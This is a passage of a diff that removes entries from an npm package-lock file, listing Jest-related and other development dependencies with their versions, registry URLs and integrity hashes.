"requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": 